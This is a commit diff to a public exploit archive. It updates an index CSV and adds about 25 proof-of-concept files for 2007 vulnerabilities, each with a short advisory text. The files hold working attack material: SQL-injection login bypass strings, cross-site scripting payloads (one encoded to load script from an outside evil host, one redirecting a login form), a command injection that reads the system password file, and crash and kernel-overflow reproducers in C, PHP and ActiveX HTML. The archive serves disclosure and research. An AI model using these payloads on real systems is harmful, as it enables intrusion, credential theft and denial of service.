Updated 01_08_2014

files.csv

@@ -27518,6 +27518,7 @@ id,file,description,date,author,platform,type,port
 30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0
 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
+30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0
 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0
 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0
 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal tc/contents/home001.jsp contentid Parameter XSS",2007-10-15,JosS,jsp,webapps,0
@@ -27525,6 +27526,8 @@ id,file,description,date,author,platform,type,port
 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module SQL Injection Vulnerability",2007-10-16,"Humberto J. Abdelnur",linux,remote,0
 30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP Softphone 2050 RTCP Port Buffer Overflow Vulnerability",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0
 30679,platforms/hardware/dos/30679.pl,"Nortel Networks Multiple UNIStim VoIP Products Remote Eavesdrop Vulnerability",2007-10-18,"Daniel Stirnimann",hardware,dos,0
+30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc SecDRV.SYS Method_Neither Local Privilege Escalation Vulnerability",2007-10-18,"Elia Florio",windows,local,0
+30681,platforms/windows/local/30681.txt,"SpeedFan Speedfan.sys Local Privilege Escalation Vulnerability",2007-10-18,"Ruben Santamarta ",windows,local,0
 30682,platforms/php/webapps/30682.txt,"SiteBar <= 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0
 30683,platforms/php/webapps/30683.txt,"SiteBar <= 3.3.8 (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0
 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
@@ -27588,3 +27591,28 @@ id,file,description,date,author,platform,type,port
 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0
 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0
 30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0
+30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0
+30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0
+30756,platforms/windows/remote/30756.html,"Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,remote,0
+30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0
+30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0
+30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 Searchtype Parameter Cross-Site Scripting Vulnerability",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
+30760,platforms/php/dos/30760.txt,"PHP 5.2.5 Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0
+30761,platforms/windows/dos/30761.html,"WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0
+30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin Cross-Site Scripting Vulnerability",2007-11-13,"Fracesco Vaj",php,webapps,0
+30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service Vulnerability",2007-11-14,"laurent gaffie",linux,dos,0
+30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 Dialog.PHP Unauthorized Access Vulnerability",2007-11-14,d3hydr8,php,webapps,0
+30765,platforms/osx/local/30765.c,"Apple Mac OS X v10.4.11 2007-008 i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0
+30766,platforms/linux/dos/30766.c,"GNU TAR <= 1.15.91 and CPIO <= 2.5.90 safer_name_suffix Remote Denial of Service Vulnerability",2007-11-14,"Dmitry V. Levin",linux,dos,0
+30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow Vulnerability",2007-06-25,"Azizov E",windows,dos,0
+30768,platforms/multiple/remote/30768.txt,"IBM WebSphere Application Server 5.1.1 WebContainer HTTP Request Header Security Weakness",2007-11-15,anonymous,multiple,remote,0
+30769,platforms/php/webapps/30769.txt,"Nuked-Klan 1.7.5 File Parameter News Module Cross-Site Scripting Vulnerability",2007-11-15,Bl@ckM@mba,php,webapps,0
+30770,platforms/cgi/webapps/30770.txt,"AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
+30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection Vulnerability",2007-11-15,"Jan Fry",multiple,remote,0
+30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
+30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting Vulnerability",2007-11-16,"Adrian Pastor",php,webapps,0
+30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 Login.ASP Multiple SQL Injection Vulnerabilities",2007-11-17,"Aria-Security Team",asp,webapps,0
+30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 Generic_API_Call.PL Cross-Site Scripting Vulnerability",2007-11-19,nnposter,cgi,webapps,0
+30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
+30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
+30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0

platforms/asp/webapps/30775.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/26479/info
+
+JiRo's Banner System is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JiRo's Banner System 2.0 is vulnerable; other versions may also be affected.
+
+
+The following proof-of-concept login and password examples are available:
+
+Login: anything' OR 'x'='x
+Password: anything' OR 'x'='x 

platforms/asp/webapps/30778.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26493/info
+
+Click&BaneX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.html?ClickAndRank/details.asp
+
+Username: anything' OR 'x'='x
+Password: anything' OR 'x'='x 

platforms/cgi/webapps/30759.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26419/info
+
+Web Gateway is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects versions prior to Web Gateway 48.1.1. 
+
+http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searchtype=subject%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&kind=ns&conf=080104+++++++ 

platforms/cgi/webapps/30770.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26464/info
+
+AIDA Web is prone to multiple unauthorized access vulnerabilities.
+
+An attacker could exploit these issues to obtain potentially sensitive information that could aid in further attacks. 
+
+http://www.example.com/CGI-Bin/frame.html?Mehr=xxx
+http://www.example.com/CGI-Bin/frame.html?Mehr=xxx&SUPER=x 

platforms/cgi/webapps/30777.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26491/info
+
+Citrix NetScaler is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Citrix NetScaler 8.0 build 47.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e 

platforms/hardware/remote/30755.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/26412/info
+
+F5 FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
+
+5.4 through 5.5.2
+6.0
+6.0.1
+
+https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
+https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i 

platforms/linux/dos/30763.php

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26435/info
+
+KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies.
+
+An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.
+
+Konqueror 3.5.6 is vulnerable; other versions may also be affected.
+
+<?php
+ini_set("memory_limit","200M");
+setcookie("hi_fox", str_repeat("A",19999999));
+?> 

platforms/linux/dos/30766.c

@@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/26445/info
+
+GNU's tar and cpio utilities are prone to a denial-of-service vulnerability because of insecure use of the 'alloca()' function.
+
+Successfully exploiting this issue allows attackers to crash the affected utilities and possibly to execute code, but this has not been confirmed.
+
+GNU tar and cpio utilities share the same vulnerable code and are both affected. Other utilities sharing this code may also be affected.
+
+/*
+ * paxlib's safer_name_suffix() stack overflow reproducer.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <error.h>
+#include <fcntl.h>
+#include <sys/resource.h>
+#include <libtar.h>
+
+int main(int ac, const char *av[])
+{
+	struct rlimit r;
+	unsigned count, i;
+	char *s;
+	TAR *t;
+
+	if (ac != 2)
+		error(1, 0, "exactly two arguments expected");
+
+	if (getrlimit(RLIMIT_STACK, &r))
+		error(1, errno, "getrlimit RLIMIT_STACK");
+
+	count = r.rlim_cur / 3 + 1;
+	if (!(s = malloc(count * 3 + 1)))
+		error(1, errno, "malloc: %u", count * 3 + 1);
+
+	for (i = 0; i < count; ++i)
+		memcpy(s + i * 3, "../", 3);
+	s[count * 3] = '\0';
+
+	if (tar_open(&t, av[1], NULL, O_WRONLY|O_CREAT, 0644, TAR_GNU))
+		error(1, errno, "tar_open: %s", av[1]);
+
+	if (tar_append_file(t, "/dev/null", s))
+		error(1, errno, "tar_append_file: %s", av[1]);
+
+	if (tar_close(t))
+		error(1, errno, "tar_close");
+
+	return 0;
+}

platforms/linux/local/30780.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26503/info
+
+ISPmanager is prone to a local privilege-escalation vulnerability.
+
+A local attacker can exploit this issue to gain elevated privileges on the affected computer. A successful exploit will lead to the complete compromise of the affected computer.
+
+ISPmanager 4.2.15.1 is reported vulnerable; other versions may be affected as well.
+
+/usr/local/ispmgr/sbin/responder /tmp/ '` cat /etc/master.passwd1>&2 `' 2>&1 

platforms/multiple/remote/30768.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26457/info
+
+IBM WebSphere Application Server is prone to a security weakness regarding an HTTP request header. The software fails to sanitize a certain HTTP header when the data is redirected to an error message.
+
+An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks. 
+
+var req:LoadVars=new LoadVars();
+req.addRequestHeader("Expect",
+"<script>alert('gotcha!')</script>");
+req.send("http://www.target.site/","_blank","GET");

platforms/multiple/remote/30771.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26465/info
+
+Aruba MC-800 Mobility Controller is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible. 
+
+https://www.example.com:4343/screens/%22/%3E%3Cscript%3Ealert(1)%3C/script%3E 

platforms/osx/local/30765.c

@@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/26444/info
+
+Apple Mac OS X is prone to multiple security vulnerabilities.
+
+These issues affect Mac OS X and various applications, including AppleRAID, CFFTP, CFNetwork, CoreFoundation, CoreText, kernel, remote_cmds, networking, NFS, NSURL, SecurityAgent, WebCore, and WebKit.
+
+Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers.
+
+Apple Mac OS X 10.4.10 and prior versions are vulnerable to these issues. 
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <architecture/i386/table.h>
+#include <i386/user_ldt.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+
+int
+main(void)
+{
+    union ldt_entry descs;
+    char *buf;
+    u_long pgsz = sysconf(_SC_PAGESIZE);
+
+    if ((buf = (char *)malloc(pgsz * 4)) == -1) {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+    }
+
+    memset(buf, 0x41, pgsz * 4);
+
+    buf = (char *)(((u_long)buf & ~pgsz) + pgsz);
+
+    if (mprotect((char *)((u_long)buf + (pgsz * 2)), (size_t)pgsz,
+    PROT_WRITE) == -1) {
+        perror("mprotect");
+        exit(EXIT_FAILURE);
+    }
+
+    /*
+     * This will result in kalloc() size argument being 0x00000000 and copyin()
+     * size argument being 0xfffffff8.
+     */
+
+    if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) {
+        perror("i386_set_ldt");
+        exit(EXIT_FAILURE);
+    }
+
+    exit(EXIT_SUCCESS);
+}

platforms/osx/remote/30781.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/26510/info
+
+Apple Mac OS X is prone to a vulnerability that can allow arbitrary code to run. This issue affects the Mail application when handling email attachments.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. This will compromise the application and possibly the underlying operating system.
+
+This issue affects Mac OS X 10.5.
+
+NOTE: This vulnerability may be related to CVE-2007-0395 documented in BID 16907 (Apple Mac OS X Security Update 2006-001 Multiple Vulnerabilities). Although the issues seem similar in nature, this may not be the very same underlying vulnerability. We will update this BID as more information emerges.
+
+UPDATE (November 21, 2007): Reports indicate that this issue occurs because of an error in the application's quarantine feature. We have not confirmed this information.
+
+UPDATE (December 17, 2007): This vulnerability stems from an unspecified implementation issue in the Launch Services application.
+http://www.securityfocus.com/bid/16907 
+
+/bin/ls -al
+echo
+echo
+echo "heise Security: You are vulnerable."
+echo
+echo

platforms/php/dos/30760.txt

@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/26428/info
+
+PHP is prone to multiple denial-of-service vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
+
+Attackers can exploit these issues to cause denial-of-service conditions. Given the nature of these issues, attackers may also be able to execute arbitrary code, but this has not been confirmed.
+
+PHP 5.2.5 is vulnerable; other versions may also be affected. 
+
+Proof of concept example :
+
+root@unsafebox:/# uname -a
+Linux unsafebox 2.6.20-16-generic #2 SMP Sun Sep 23 19:50:39 UTC 2007 
+i686 GNU/Linux
+
+root@unsafebox:/# php -v
+PHP 5.2.5 (cli) (built: Nov 11 2007 07:56:04)
+Copyright (c) 1997-2007 The PHP Group
+Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
+
+root@unsafebox:/# php -r 'dgettext(str_repeat("A",8476509),"hi");'
+Erreur de segmentation (core dumped)
+
+root@unsafebox:/# php -r 
+'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'
+Erreur de segmentation (core dumped)
+
+root@unsafebox:/# php -r 
+'dngettext("hi",str_repeat("A",8476509),"hi",-1);'
+Erreur de segmentation (core dumped)
+
+root@unsafebox:/# php -r 'gettext(str_repeat("A",8476509));'
+Erreur de segmentation (core dumped)
+
+root@unsafebox:/# php -r 'ngettext(str_repeat("A",8476509),"hi",-1);'
+Erreur de segmentation (core dumped)
+
+root@unsafebox:/# php -r 
+'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'
+Erreur de segmentation (core dumped)

platforms/php/webapps/30754.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26411/info
+
+AutoIndex PHP Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+AutoIndex PHP Script 2.2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/AutoIndex/index.php/"><script>alert(document.cookie)</script> 

platforms/php/webapps/30757.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26417/info
+
+X7 Chat is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
+
+These issues affect X7 Chat 2.0.4; other versions may be also vulnerable. 
+
+http://www.example.com/sources/frame.php?room=<script>alert(123);</script> 

platforms/php/webapps/30758.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26417/info
+ 
+X7 Chat is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
+ 
+These issues affect X7 Chat 2.0.4; other versions may be also vulnerable. 
+
+http://www.example.com/upgradev1.php?INSTALL_X7CHATVERSION=<script>alert(123);</script>

platforms/php/webapps/30762.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26432/info
+
+WP-SlimStat Plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects WP-SlimStat Plugin 0.9.2; other versions may also be vulnerable. 
+
+www.example.com/wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=<Script Code> 

platforms/php/webapps/30764.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26437/info
+
+CONTENTCustomizer is prone to an unauthorized access vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker could exploit this issue to delete arbitrary files, rename files, or reset the content of certain files.
+
+CONTENTCustomizer 3.1mp is vulnerable; other versions may also be affected.
+
+http://www.example.com/dialog.php?action=del&doc='+pagename // Delete
+http://www.example.com/dialog.php?action=delbackup&doc='+pagename // Delete Backup
+http://www.example.com/dialog.php?action=res&doc='+pagename // Reset
+http://www.example.com/dialog.php?action=ren&doc='+pagename // Rename 

platforms/php/webapps/30769.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/26458/info
+
+Nuked-Klan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Nuked-Klan 1.7.5 is vulnerable; other versions may also be affected.
+
+Exploit XSS:
+The GET variable 'file' has been set to:
+&#039;;alert(String.fromCharCode(88,83,83))//\&#039;;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88 ,83,83))//--></SCRIPT>">&#039;><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
+
+Proof-of-concpet URI:
+http://www.example.com/index.php?file=News%3CScRiPt%20%0a%0d%3Ealert(1121436095)%3B%3C/ScRiPt%3E

platforms/php/webapps/30774.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26470/info
+
+Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Liferay Portal 4.1.0 and 4.1.1 are vulnerable; other versions may also be affected.
+
+http://www.example.com/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http://www.example2.com%22%3C/script%3E%3Ca%20b=%22c 

platforms/windows/dos/30672.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26066/info
+
+Live for Speed is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the vulnerable application. Successfully exploiting this issue will allow remote attackers to compromise affected computers. Failed exploit attempts will likely cause denial-of-service conditions.
+
+UPDATE (December 24, 2007): The recently released Y patch does not address this issue. Please see the references for more information. 
+
+http://www.exploit-db.com/sploits/30672.zip

platforms/windows/dos/30761.html

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/26430/info
+
+WebEx is prone to multiple remote denial-of-service vulnerabilities.
+
+Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users.
+
+<html>
+ <head>
+  <script language="JavaScript" DEFER>
+    function Check() {
+        var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
+
+        obj.InitParam("A");
+}
+  </script>
+
+ </head>
+ <body onLoad="JavaScript: return Check();">
+
+ </body>
+
+</html>

platforms/windows/dos/30767.html

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26448/info
+
+Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.
+
+A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 
+
+<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html> 

platforms/windows/local/30680.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26121/info
+
+Macrovision SafeDisc is prone to a local privilege-escalation vulnerability because it fails to adequately sanitize user-supplied input.
+
+Exploiting this vulnerability allows local attackers to execute arbitrary malicious code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.
+
+UPDATE: This issue affects only Microsoft Windows XP and 2003 platforms. Microsoft Vista is not affected. 
+
+http://www.exploit-db.com/sploits/30680.zip

platforms/windows/local/30681.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26123/info
+
+SpeedFan is prone to a local privilege-escalation vulnerability.
+
+An attacker could exploit this issue to execute arbitrary machine code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. 
+
+http://www.exploit-db.com/sploits/30681.zip

platforms/windows/remote/30756.html

@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/26414/info
+
+Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.
+
+Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.
+
+Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0. 
+
+<html>
+ <head>
+  <script language="JavaScript" DEFER>
+    function Check() {
+      var obj;
+
+      //Forms.Checkbox.1
+      obj = new ActiveXObject("Forms.Checkbox.1");
+      obj.Caption = "A";
+      obj.GroupName = "A";
+      obj.Accelerator = "A";
+
+      //Forms.OptionButton.1
+      obj = new ActiveXObject("Forms.OptionButton.1");
+      obj.Caption = "A";
+      obj.GroupName = "A";
+      obj.Accelerator = "A";
+
+      //Forms.ToggleButton.1
+      obj = new ActiveXObject("Forms.ToggleButton.1");
+      obj.Caption = "A";
+      obj.GroupName = "A";
+      obj.Accelerator = "A";
+
+     //Forms.ComboBox.1
+     obj = new ActiveXObject("Forms.ComboBox.1");
+     obj.Text = "A";
+     obj.Value = "A";
+    
+
+     //Forms.TextBox.1
+     obj = new ActiveXObject("Forms.Textbox.1");
+     obj.Text = "A";
+     obj.Value = "A";
+     obj.SelStart = 1;
+}
+  </script>
+
+ </head>
+ <body onLoad="JavaScript: return Check();" />
+</html> 

platforms/windows/remote/30772.html

@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/26467/info
+
+ComponentOne FlexGrid ActiveX Control is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to adequately check boundaries on user-supplied input.
+
+An attacker can exploit these issues to cause denial denial-of-service conditions and possibly to execute arbitrary code, but this has not been confirmed.
+
+ComponentOne FlexGrid 7.1 Light is vulnerable; other versions may also be affected. 
+
+<html>
+ <head>
+  <script language="JavaScript" DEFER>
+    function Check() {
+     var s = "AAAA";
+
+     while (s.length < 262145) s=s+s;
+
+     var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");
+
+     obj.Text = s;
+     obj.EditSelText = s;
+     obj.EditText = s;
+     obj.CellFontName = s;
+   }
+  </script>
+
+ </head>
+ <body onload="JavaScript: return Check();" />
+</html>